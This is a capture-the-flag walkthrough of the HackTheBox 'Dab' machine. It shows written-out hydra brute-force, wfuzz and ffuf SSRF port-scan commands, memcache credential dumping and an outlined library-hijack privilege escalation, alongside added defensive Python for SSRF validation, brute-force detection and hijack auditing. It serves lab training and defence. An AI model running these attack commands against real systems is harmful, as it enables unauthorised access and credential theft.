HackTheBox - Dab

Last updated 4 years ago

Nmap scan results (Basic and all port scan)

Using gobuster to scan the webpage on port 80 and 8080

gobuster dir -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://dab.htb/ -o gobuster-80-scan.out

# cat gobuster-80-scan.out
/login                (Status: 200) [Size: 473]
/logout               (Status: 302) [Size: 209] [--> http://dab.htb/]

gobuster dir -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://dab.htb:8080/ -o gobuster-8080-scan.out

# cat gobuster-8080-scan.out
/socket               (Status: 200) [Size: 287]

Bruteforcing the login page on port 80

hydra -l admin -P /opt/SecLists/Passwords/Common-Credentials/10k-most-common.txt 10.10.10.86 http-post-form "/login:username=^USER^&password=^PASS^&submit=Login:Error: Login failed."

Testing the webpage on port 8080

The root page shows the following error: Access denied: password authentication cookie not set

I created a wordlist with the words password and authentication in it.

We will use Burp Suite's Intruder tab to fuzz the cookie name.

Now let's fuzz the value for cookie using wfuzz.

wfuzz -c -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt --hw 29 -u http://dab.htb:8080/ -b 'password=FUZZ'

Searching for open ports (SSRF Fuzzing)

ffuf -w ports.txt -u "http://dab.htb:8080/socket?port=FUZZ&cmd=localhost" -b 'password=secret' -c
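The /socket endpoint takes a host (cmd=) and a port and connects wherever it is told, which is exactly why it can be used to enumerate the box's own listening ports. The check below is the one a defender would put in front of such an endpoint: parse the port, compare it against an explicit allowlist, resolve the host and reject anything that lands on a loopback, private, link-local or otherwise non-public address. This is an added example written for this page, not code from the write-up or the box; the function names, the port allowlist and the fake resolver (used so the example runs offline) are my own assumptions.

```python
"""Allowlist check for a user-supplied host/port, as a defender would put in
front of an endpoint like /socket?port=...&cmd=<host>.

Added example written for this page, not code from the write-up or the box.
Function names, the port allowlist and the fake resolver are assumptions;
the real endpoint is only known to take a host and a port.
"""
import ipaddress
import socket

# Constructed allowlist: only the ports the feature legitimately needs.
ALLOWED_PORTS = {80, 443}


def is_public_address(ip: str) -> bool:
    """True only for globally routable unicast addresses (no loopback, RFC 1918, link-local...)."""
    addr = ipaddress.ip_address(ip.split("%")[0])  # drop any IPv6 scope id
    return not (addr.is_loopback or addr.is_private or addr.is_link_local
                or addr.is_reserved or addr.is_multicast or addr.is_unspecified)


def validate_target(host, port, resolver=socket.getaddrinfo, allowed_ports=ALLOWED_PORTS):
    """Return (ok, reason). Every address the host resolves to must be public,
    otherwise a single A/AAAA record pointing at 127.0.0.1 would slip past."""
    try:
        port_num = int(port)
    except (TypeError, ValueError):
        return False, "port is not an integer"
    if not 1 <= port_num <= 65535:
        return False, "port out of range"
    if port_num not in allowed_ports:
        return False, "port not in allowlist"
    try:
        infos = resolver(host, port_num, proto=socket.IPPROTO_TCP)
    except (socket.gaierror, UnicodeError):
        return False, "host does not resolve"
    if not infos:
        return False, "host does not resolve"
    for info in infos:
        ip = info[4][0]
        if not is_public_address(ip):
            return False, f"host resolves to non-public address {ip}"
    return True, "ok"


def fake_resolver(host, port, proto=None):
    """Constructed stand-in for socket.getaddrinfo so the example runs offline."""
    table = {"localhost": "127.0.0.1", "dab.htb": "10.10.10.86", "example.com": "93.184.216.34"}
    try:
        ip = table.get(host) or str(ipaddress.ip_address(host))
    except ValueError:
        raise socket.gaierror(-2, "Name or service not known")
    return [(socket.AF_INET, socket.SOCK_STREAM, proto or 0, "", (ip, port))]


if __name__ == "__main__":
    for host, port in [("localhost", "11211"), ("localhost", "80"), ("dab.htb", "80"),
                       ("127.0.0.1", "443"), ("example.com", "443"), ("nope.invalid", "80")]:
        print(host, port, validate_target(host, port, resolver=fake_resolver))
```

One caveat the check alone does not solve: the address you validated must also be the address you connect to, otherwise a DNS answer that changes between the lookup and the connect (rebinding) bypasses the test. Connect to the resolved IP rather than re-resolving the hostname.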

Pentesting Memcache (Running on port 11211)

Memcached is an open-source distributed memory object caching system that speeds up dynamic web applications by caching data and objects in memory. It is also used to cache entire database tables and query results to take load off the database.

# Commands to be used
stats
version
stats slabs
stats items
stats cachedump <number> 0
get <item-name>

Getting slabs

Getting items with info

Getting key names (the trailing 0 means unlimited output)

To read the users item, we can use the get users command.

If we run the following command, we get no data back, because no cache entry has been generated recently. Let's log out and log in again, then try to get the data.

Hash cracking using John

Let's take this data and apply some BashFu to organize it into user:hash lines.

Bash command used: cat users.json | jq | awk -F\" '{print $2,$4}' | sed -r 's/ /:/g' > userpass.txt
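The awk/sed pipeline works because jq pretty-prints one "user": "hash" pair per line, but it silently mangles any username containing a quote, a space or a colon. As an added example (my own code, not the write-up's), here is the same conversion done by parsing the JSON properly and reporting entries that cannot be fed to john. It assumes, as the pipeline's $2/$4 fields imply, that the dump is a JSON object mapping username to hash; the sample data is constructed.

```python
"""Replacement for the awk/sed pipeline: read the users dump as JSON and
emit one `user:hash` line per entry for john.

Added example for this page, not the write-up's code. Assumes the dump is a
JSON object of username -> password hash; the sample data is constructed.
"""
import json
import re

HEX_HASH = re.compile(r"^[0-9a-fA-F]{32,128}$")  # md5 through sha512 digest lengths

# Constructed sample: admin's value is md5("password"), alice's is md5("a"),
# bob's value is not a digest, and the last username would confuse john.
SAMPLE_JSON = json.dumps({
    "admin": "5f4dcc3b5aa765d61d8327deb882cf99",
    "alice": "0CC175B9C0F1B6A831C399E269772661",
    "bob": "not a hash",
    "mal:user": "5f4dcc3b5aa765d61d8327deb882cf99",
})


def users_to_john(json_text):
    """Return (john_input_text, skipped) where skipped lists (user, reason) for unusable entries."""
    data = json.loads(json_text)
    if not isinstance(data, dict):
        raise ValueError("expected a JSON object of username -> hash")
    lines, skipped = [], []
    for user, value in data.items():
        # john splits on the first ':' and treats whitespace oddly, so such names need manual handling
        if ":" in user or any(c.isspace() for c in user):
            skipped.append((user, "username contains ':' or whitespace"))
            continue
        if not isinstance(value, str) or not HEX_HASH.match(value):
            skipped.append((user, "value is not a hex digest"))
            continue
        lines.append(f"{user}:{value.lower()}")
    return "\n".join(lines) + ("\n" if lines else ""), skipped


if __name__ == "__main__":
    text, skipped = users_to_john(SAMPLE_JSON)
    print(text, end="")
    for user, reason in skipped:
        print(f"skipped {user!r}: {reason}")
```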

Bruteforcing SSH using hydra
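Both hydra runs on this page (the http-post-form attack on port 80 and the SSH attack) leave the same footprint on the target: a burst of authentication failures from one source address. As an added example (my own code, not the write-up's), the detector below walks log lines, extracts failed logins and raises one alert per source IP once it exceeds a threshold inside a sliding time window. The sshd line format is the real auth.log one; the web[...] lines imitate an application log and are a constructed format, as are all addresses and usernames in the sample.

```python
"""Sliding-window detector for the password guessing done with hydra above
(web login on port 80 and SSH).

Added example for this page, not code from the write-up. The sshd format is
the real auth.log one; the web[...] lines, IPs and users are constructed.
"""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample: one source hammering SSH, one source with two web failures.
SAMPLE_LOG = """\
Jan 10 12:00:01 dab sshd[2201]: Failed password for alice from 10.10.14.5 port 51234 ssh2
Jan 10 12:00:02 dab sshd[2203]: Failed password for alice from 10.10.14.5 port 51236 ssh2
Jan 10 12:00:03 dab web[1234]: login failed for user admin from 10.10.14.9
Jan 10 12:00:03 dab sshd[2205]: Failed password for invalid user root from 10.10.14.5 port 51238 ssh2
Jan 10 12:00:04 dab sshd[2207]: Failed password for alice from 10.10.14.5 port 51240 ssh2
Jan 10 12:00:05 dab sshd[2209]: Accepted password for alice from 10.10.14.12 port 51300 ssh2
Jan 10 12:00:06 dab sshd[2211]: Failed password for alice from 10.10.14.5 port 51242 ssh2
Jan 10 12:00:40 dab web[1234]: login failed for user admin from 10.10.14.9
"""

SYSLOG_TS = r"(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d)"
PATTERNS = [
    re.compile(SYSLOG_TS + r" \S+ sshd\[\d+\]: Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+"),
    re.compile(SYSLOG_TS + r" \S+ web\[\d+\]: login failed for user (?P<user>\S+) from (?P<ip>\S+)"),
]


def parse_failure(line, year=2020):
    """Return (timestamp, source ip, username) for a failed-login line, else None.
    Syslog timestamps carry no year, so one is supplied (assumption)."""
    for pat in PATTERNS:
        m = pat.match(line)
        if m:
            ts = datetime.strptime(m.group("ts"), "%b %d %H:%M:%S").replace(year=year)
            return ts, m.group("ip"), m.group("user")
    return None


def detect_bruteforce(lines, threshold=5, window=timedelta(seconds=60)):
    """Alert once per source IP when it produces `threshold` failures within `window`.
    Returns a list of (ip, first failure time in window, failures in window, usernames tried so far)."""
    recent = defaultdict(deque)   # ip -> timestamps of failures still inside the window
    users = defaultdict(set)      # ip -> every username it has tried
    alerted = set()
    alerts = []
    for line in lines:
        parsed = parse_failure(line)
        if parsed is None:
            continue
        ts, ip, user = parsed
        q = recent[ip]
        q.append(ts)
        users[ip].add(user)
        while ts - q[0] > window:   # drop failures that fell out of the window
            q.popleft()
        if len(q) >= threshold and ip not in alerted:
            alerted.add(ip)
            alerts.append((ip, q[0], len(q), sorted(users[ip])))
    return alerts


if __name__ == "__main__":
    for ip, first, count, tried in detect_bruteforce(SAMPLE_LOG.splitlines()):
        print(f"{ip}: {count} failures since {first:%H:%M:%S}, users tried: {', '.join(tried)}")
```

The username set is kept per source so that a low-and-slow spray (many users, few attempts each) still shows up in the alert even when the per-window count is modest; tune threshold and window to the service's normal failure rate.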

Using find command to search for SUID files

/usr/bin/myexec looks suspicious; we can transfer that file to our machine using netcat.

Analyzing the myexec binary in Ghidra

Main Function:

To recover the stored password, decode the hex value; the resulting string is s3cur3l0g1n

Creating a malicious library to hijack seclogin()

The seclogin() function is not implemented inside the binary itself, so this looks like a library hijacking candidate.

The seclogin function is provided by the libcseclogin.so file; you can confirm this with strings or readelf on the binary.

Let's create a malicious library.

We can run ldconfig as root, so let's do that.
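Two conditions make this privilege escalation possible: a SUID binary needs a shared library that is missing (or would be found in a directory a non-root user can write to), and the user can run ldconfig as root to make the loader pick it up. The script below is an added example of the audit a defender would run for those conditions; it is my own code, not anything from the write-up or the box. It shells out to readelf -d, as the write-up suggests for checking the imports; the function names, the trusted-directory list and the sample inputs are my own assumptions.

```python
"""Audit for the conditions behind the myexec-style library hijack: a needed
library that is missing, or a loader search directory a non-root user can write.

Added example for this page, not code from the write-up or the box. Uses
readelf -d; function names, DEFAULT_DIRS and the samples are assumptions.
"""
import glob
import os
import re
import stat
import subprocess

# Directories the dynamic loader always trusts (assumption: typical glibc layout).
DEFAULT_DIRS = ["/lib", "/usr/lib", "/lib64", "/usr/lib64"]
NEEDED_RE = re.compile(r"\(NEEDED\)\s+Shared library: \[([^\]]+)\]")

# Constructed samples so the parsing functions can be exercised offline.
SAMPLE_CONF = "include /etc/ld.so.conf.d/*.conf\n/usr/local/lib  # constructed extra path\n"
SAMPLE_READELF = (
    " 0x0000000000000001 (NEEDED)             Shared library: [libcseclogin.so]\n"
    " 0x0000000000000001 (NEEDED)             Shared library: [libc.so.6]\n"
    " 0x000000000000000c (INIT)               0x1000\n"
)


def parse_ld_so_conf(text):
    """Split one ld.so.conf file into (search directories, include patterns)."""
    dirs, includes = [], []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        if line.startswith("include"):
            includes.append(line.split(None, 1)[1])
        else:
            dirs.append(line)
    return dirs, includes


def classify_dir(mode, uid):
    """Return why a search directory is unsafe for library loading, or None."""
    if mode & stat.S_IWOTH:
        return "world-writable"
    if uid != 0:
        return f"owned by uid {uid}"
    if mode & stat.S_IWGRP:
        return "group-writable"
    return None


def parse_needed(readelf_output):
    """Library names from the DT_NEEDED entries of `readelf -d` output."""
    return NEEDED_RE.findall(readelf_output)


def unresolved_libraries(needed, search_dirs, exists=os.path.exists):
    """Needed libraries that are not present in any search directory."""
    return [lib for lib in needed
            if not any(exists(os.path.join(d, lib)) for d in search_dirs)]


def system_search_dirs(conf_path="/etc/ld.so.conf"):
    """Follow /etc/ld.so.conf and its includes, then add the loader defaults."""
    dirs = []

    def walk(path):
        with open(path) as fh:
            found, includes = parse_ld_so_conf(fh.read())
        dirs.extend(found)
        for pattern in includes:
            if not os.path.isabs(pattern):
                pattern = os.path.join(os.path.dirname(path), pattern)
            for child in sorted(glob.glob(pattern)):
                walk(child)

    if os.path.exists(conf_path):
        walk(conf_path)
    return dirs + DEFAULT_DIRS


def audit_binary(path):
    """Findings for one binary: writable search dirs plus unresolved DT_NEEDED libraries."""
    out = subprocess.run(["readelf", "-d", path], capture_output=True, text=True, check=True).stdout
    dirs = system_search_dirs()
    findings = []
    for d in dirs:
        try:
            st = os.stat(d)
        except FileNotFoundError:
            continue
        why = classify_dir(st.st_mode, st.st_uid)
        if why:
            findings.append(f"search dir {d} is {why}")
    for lib in unresolved_libraries(parse_needed(out), dirs):
        findings.append(f"{path} needs {lib}, which is in no search dir (anyone who can write one can supply it)")
    return findings


if __name__ == "__main__":
    import sys
    for finding in audit_binary(sys.argv[1] if len(sys.argv) > 1 else "/usr/bin/myexec"):
        print(finding)
```

On this box the unresolved-library finding is the whole story: the library is absent and ldconfig may be run as root, so the fix is to ship the library in a root-owned search directory and drop the sudo rule for ldconfig, which otherwise lets any user refresh the loader cache after planting a file.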

References:

https://book.hacktricks.xyz/pentesting/11211-memcache